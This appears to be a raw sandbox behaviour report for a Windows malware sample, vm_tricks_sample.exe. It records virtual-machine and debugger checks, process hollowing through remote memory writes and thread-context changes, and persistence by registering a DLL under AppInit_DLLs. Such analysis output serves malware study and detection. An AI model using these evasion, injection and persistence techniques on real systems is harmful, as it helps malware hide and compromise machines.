C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjects BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjects\WT8AYZWL BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjects\WT8AYZWL BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjects\WT8AYZWL BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
File Path Disposition Data Ascii Data Completion Count Source Address Symbol

Section Activites
Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 260000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 280000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 2D0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 320000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\KnownDlls\WS2_32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\WS2HELP.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1
\KnownDlls\WININET.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\Normaliz.dll write and read and execute unknown 330000 36864 own pid read write conflicting addresses 1
\KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 350000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 360000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 360000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 920000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 390000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 390000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 390000 4096 own pid readonly success or wait 1
unknown query and write and read commit 3B0000 16384 own pid read write success or wait 1
unknown query and write and read commit 3B0000 16384 own pid read write success or wait 1
unknown query and write and read commit 3B0000 16384 own pid read write success or wait 1
unknown query and write and read commit 3B0000 16384 own pid read write success or wait 1
unknown query and write and read commit 3B0000 16384 own pid read write success or wait 1
unknown query and write and read commit 3B0000 16384 own pid read write success or wait 1
unknown query and write and read commit 3B0000 16384 own pid read write success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
C:\WINDOWS\system32\shell32.dll read commit B20000 8462336 own pid readonly success or wait 1
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit B20000 618496 own pid readonly success or wait 1
\BaseNamedObjects\Local\C:_Documents and Settings_Administrator_Local Settings_Temporary Internet Files_Content.IE5_index.dat_32768 write unknown 3E0000 32768 own pid read write success or wait 1
\BaseNamedObjects\Local\C:_Documents and Settings_Administrator_Cookies_index.dat_16384 write unknown 3F0000 16384 own pid read write success or wait 1
\BaseNamedObjects\Local\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_index.dat_32768 write unknown B20000 32768 own pid read write success or wait 1
\KnownDlls\RASAPI32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\rasapi32.dll query and write and read and execute image 76EE0000 245760 own pid read write success or wait 1
\KnownDlls\rasman.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\rasman.dll query and write and read and execute image 76E90000 73728 own pid read write success or wait 1
\KnownDlls\NETAPI32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\netapi32.dll query and write and read and execute image 5B860000 348160 own pid read write success or wait 1
\KnownDlls\TAPI32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\tapi32.dll query and write and read and execute image 76EB0000 192512 own pid read write success or wait 1
\KnownDlls\rtutils.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\rtutils.dll query and write and read and execute image 76E80000 57344 own pid read write success or wait 1
\KnownDlls\WINMM.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\winmm.dll query and write and read and execute image 76B40000 184320 own pid read write success or wait 1
C:\WINDOWS\system32\tapi32.dll read commit DB0000 184320 own pid readonly success or wait 1
\KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
\KnownDlls\msapsspc.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msapsspc.dll query and write and read and execute image 71E50000 86016 own pid read write success or wait 1
\KnownDlls\MSVCRT40.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msvcrt40.dll query and write and read and execute image 78080000 69632 own pid read write success or wait 1
\KnownDlls\schannel.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\schannel.dll query and write and read and execute image 767F0000 163840 own pid read write success or wait 1
\KnownDlls\CRYPT32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\crypt32.dll query and write and read and execute image 77A80000 610304 own pid read write success or wait 1
\KnownDlls\MSASN1.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msasn1.dll query and write and read and execute image 77B20000 73728 own pid read write success or wait 1
\KnownDlls\digest.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\digest.dll query and write and read and execute image 75B00000 86016 own pid read write success or wait 1
\KnownDlls\msnsspc.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msnsspc.dll query and write and read and execute image 747B0000 290816 own pid read write success or wait 1
\KnownDlls\MSVCRT40.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msvcrt40.dll query and write and read and execute image 78080000 69632 own pid read write success or wait 1
\KnownDlls\sensapi.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\sensapi.dll query and write and read and execute image 722B0000 20480 own pid read write success or wait 1
C:\WINDOWS\system32\msv1_0.dll write and read and execute commit DB0000 139264 own pid execute success or wait 1
C:\WINDOWS\system32\msv1_0.dll query and write and read and execute image 77C70000 151552 own pid read write success or wait 1
\KnownDlls\cryptdll.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\cryptdll.dll query and write and read and execute image 76790000 49152 own pid read write success or wait 1
\KnownDlls\iphlpapi.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\iphlpapi.dll query and write and read and execute image 76D60000 102400 own pid read write success or wait 1
\BaseNamedObjects\SENS Information Cache read unknown DC0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\mswsock.dll write and read and execute commit EF0000 245760 own pid execute success or wait 1
C:\WINDOWS\system32\mswsock.dll query and write and read and execute image 71A50000 258048 own pid read write success or wait 1
\KnownDlls\hnetcfg.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\hnetcfg.dll query and write and read and execute image 662B0000 360448 own pid read write success or wait 1
C:\WINDOWS\system32\wshtcpip.dll write and read and execute commit DD0000 20480 own pid execute success or wait 1
C:\WINDOWS\system32\wshtcpip.dll query and write and read and execute image 71A90000 32768 own pid read write success or wait 1
\KnownDlls\DNSAPI.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\dnsapi.dll query and write and read and execute image 76F20000 159744 own pid read write success or wait 1
C:\WINDOWS\system32\winrnr.dll write and read and execute commit DD0000 20480 own pid execute success or wait 1
C:\WINDOWS\system32\winrnr.dll query and write and read and execute image 76FB0000 32768 own pid read write success or wait 1
\KnownDlls\WLDAP32.dll write and read and execute unknown 76F60000 180224 own pid read write success or wait 1
\KnownDlls\rasadhlp.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\rasadhlp.dll query and write and read and execute image 76FC0000 24576 own pid read write success or wait 1
C:\vm_tricks_sample.exe query and write and read and execute and extend size image 76FC0000 24576 own pid read write success or wait 1
\BaseNamedObjects\ShimSharedMemory write unknown FF0000 57344 own pid read write success or wait 1
C:\vm_tricks_sample.exe query and read commit 1000000 196608 own pid readonly success or wait 1

Registry Activites
Key Path Key Value Name Completion Count Source Address Symbol
Key Value Modified
Key Path Name Type Old Data New Data Completion Count Source Address Symbol
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager PendingFileRenameOperations unicode array 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 00 00 success or wait 1 414A20 MoveFileExA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager PendingFileRenameOperations unicode array 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 4F 00 43 00 55 00 4D 00 45 00 7E 00 31 00 5C 00 41 00 44 00 4D 00 49 00 4E 00 49 00 7E 00 31 00 5C 00 4C 00 4F 00 43 00 41 00 4C 00 53 00 7E 00 31 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 00 00 00 00 00 00 success or wait 1 414A20 MoveFileExA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager PendingFileRenameOperations unicode array 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 4F 00 43 00 55 00 4D 00 45 00 7E 00 31 00 5C 00 41 00 44 00 4D 00 49 00 4E 00 49 00 7E 00 31 00 5C 00 4C 00 4F 00 43 00 41 00 4C 00 53 00 7E 00 31 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 00 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 4F 00 43 00 55 00 4D 00 45 00 7E 00 31 00 5C 00 41 00 44 00 4D 00 49 00 4E 00 49 00 7E 00 31 00 5C 00 4C 00 4F 00 43 00 41 00 4C 00 53 00 7E 00 31 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 57 00 45 00 42 00 5C 00 00 00 00 00 00 00 success or wait 1 414A20 MoveFileExA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows AppInit_DLLs unicode C:\WINDOWS\mssys.dll success or wait 1 414A9C RegSetValueExA
Key Value Queried
Key Path Name Completion Count Source Address Symbol
HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 Identifier buffer overflow 4 4137DC RegQueryValueExA
HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 Identifier success or wait 4 4137DC RegQueryValueExA
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System SystemBiosVersion success or wait 1 4137DC RegQueryValueExA

Mutex Activites
Name Completion Count Source Address Symbol

Process Activites
Process Created
PID Filepath Cmdline Flags Completion Count Source Address Symbol
1764 C:\vm_tricks_sample.exe C:\vm_tricks_sample.exe none success or wait 1 4144EC CreateProcessA
Process Queried
PID Path Process info class Completion Count Source Address Symbol
484 C:\vm_tricks_sample.exe DebugPort success or wait 2 41226C CheckRemoteDebuggerPresent
484 C:\vm_tricks_sample.exe DebugObjectHandle port not set 1 412221 NtQueryInformationProcess
484 C:\vm_tricks_sample.exe DebugFlags success or wait 1 412238 NtQueryInformationProcess
Process Terminated
PID Filepath Completion Count Source Address Symbol
484 C:\vm_tricks_sample.exe success or wait 1 416333 ExitProcess

Thread Activites
Thread Created
TID PID EIP EAX (Usermode EIP) Filepath Completion Count Source Address Symbol
384 484 7C8106F9 414DC0 C:\vm_tricks_sample.exe success or wait 1 414B7C CreateThread
2032 484 7C8106F9 413ED0 C:\vm_tricks_sample.exe success or wait 1 414B7C CreateThread
728 484 7C8106F9 4153C0 C:\vm_tricks_sample.exe success or wait 1 414B7C CreateThread
Thread Context Set
TID PID DR0 DR1 DR2 DR3 DR7 EFLAGs EIP Completion Count Source Address Symbol
1520 1764 0 0 0 0 0 0 0 success or wait 1 41456C SetThreadContext
Thread Execution Resumed
TID PID Path Completion Count Source Address Symbol
1520 1764 C:\vm_tricks_sample.exe success or wait 1 414588 ResumeThread
Thread Delayed
TID Delay Completion Count Source Address Symbol
728 -120s user apc 1 414198 Sleep
TID PID Completion Count Source Address Symbol

Memory Activites
PID Filepath Base Length Value Completion Count Source Address Symbol
Memory Written
PID Filepath Base Length Value Completion Count Source Address Symbol
1764 C:\vm_tricks_sample.exe 400000 4096 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 BA 10 00 0E 1F B4 09 CD 21 B8 01 4C CD 21 90 90 54 68 69 73 20 70 72 6F 67 72 61 6D 20 6D 75 73 74 20 62 65 20 72 75 6E 20 75 6E 64 65 72 20 57 69 6E 33 32 0D 0A 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 1 414548 WriteProcessMemory
1764 C:\vm_tricks_sample.exe 426000 73216 2E 66 FE FF 04 10 40 00 03 07 42 6F 6F 6C 65 61 6E 01 00 04 15 FF DD F6 FF 05 46 61 6C 73 65 04 54 72 75 65 8D 0D 2C 11 01 07 49 6E 74 65 67 65 72 FE BB 6F BB 04 21 80 FF 00 7F 8B C0 44 17 0A 06 53 74 72 69 6E 67 98 EF BD 41 E6 0B 00 1F 3A 0B 4D D3 74 CB 14 39 20 03 24 28 1C A0 EE BF 69 96 36 BC F8 07 54 4F 62 6A 65 63 74 A4 33 DB 6D D9 B0 07 0C 60 71 79 73 8A 6D 64 FF DD 6D 08 C4 12 0F 0A 49 98 72 66 61 63 65 C1 DB 41 CE BE 00 C0 2D 46 03 00 B2 CC 4F 32 D9 FF 83 44 24 04 F8 E9 11 00 49 64 09 8C A0 CC CC 21 9B FD BA F1 50 FB FE 11 40 48 4B 76 0D 41 BA 11 17 08 17 8C 0E 1D 11 C8 DD B7 C2 F7 1F 0C F3 4C 10 40 2F 79 C9 E5 3C 59 48 59 58 59 11 54 FD 85 D9 64 C6 64 F0 5F FF 25 B8 E1 42 00 20 83 0C F2 07 B4 B0 AC 83 0C 32 C8 A8 A4 A0 9C 0C 32 C8 20 98 94 90 32 success or wait 1 414548 WriteProcessMemory
1764 C:\vm_tricks_sample.exe 438000 1024 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 02 00 06 00 00 00 20 00 00 80 0A 00 00 00 80 01 00 80 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 07 00 FA 0F 00 00 68 00 00 80 FB 0F 00 00 90 00 00 80 FC 0F 00 00 B8 00 00 80 FD 0F 00 00 E0 00 00 80 FE 0F 00 00 08 01 00 80 FF 0F 00 00 30 01 00 80 00 10 00 00 58 01 00 80 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 01 00 00 00 00 00 80 00 00 00 18 42 03 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 01 00 00 00 00 00 A8 00 00 00 70 44 03 00 54 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 01 00 00 00 00 00 D0 00 00 00 C4 46 03 00 EC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 01 00 00 00 00 00 F8 00 00 00 B0 47 03 00 98 01 00 success or wait 1 414548 WriteProcessMemory
1764 C:\vm_tricks_sample.exe 7FFDC008 4 00 00 40 00 success or wait 1 414548 WriteProcessMemory
Memory Allocated
PID Filepath Base Length Protection Completion Count Source Address Symbol
1764 C:\vm_tricks_sample.exe 400000 12FAB0 page read and write success or wait 1 414518 VirtualAllocEx
PID Filepath Base Length New Protection Old Protection Completion Count Source Address Symbol
Memory Usage Statistics
Time Private Usage (mb) Workingset (mb) Page File Usage (mb)
09:39:50 0 2 0
09:39:51 1 4 1
09:39:52 1 4 1

System Activites
System Information Queried
System info class Completion Count Source Address Symbol
ProcessInformation success or wait 7 4136BC CreateToolhelp32Snapshot

Timing Activites
Time Completion Count Source Address Symbol
Chronological Activities
Operation Data Completion Time
System info queried Type: ProcessInformation success or wait 536601344
System info queried Type: ProcessInformation success or wait 536726623
Key value queried Path: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 Name: Identifier buffer overflow 536848217
Key value queried Path: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 Name: Identifier success or wait 536849452
Key value queried Path: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 Name: Identifier buffer overflow 536850048
Key value queried Path: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 Name: Identifier success or wait 536850608
System info queried Type: ProcessInformation success or wait 536854019
System info queried Type: ProcessInformation success or wait 536981284
Key value queried Path: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 Name: Identifier buffer overflow 537108471
Key value queried Path: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 Name: Identifier success or wait 537110402
Key value queried Path: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 Name: Identifier buffer overflow 537111690
Key value queried Path: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 Name: Identifier success or wait 537112257
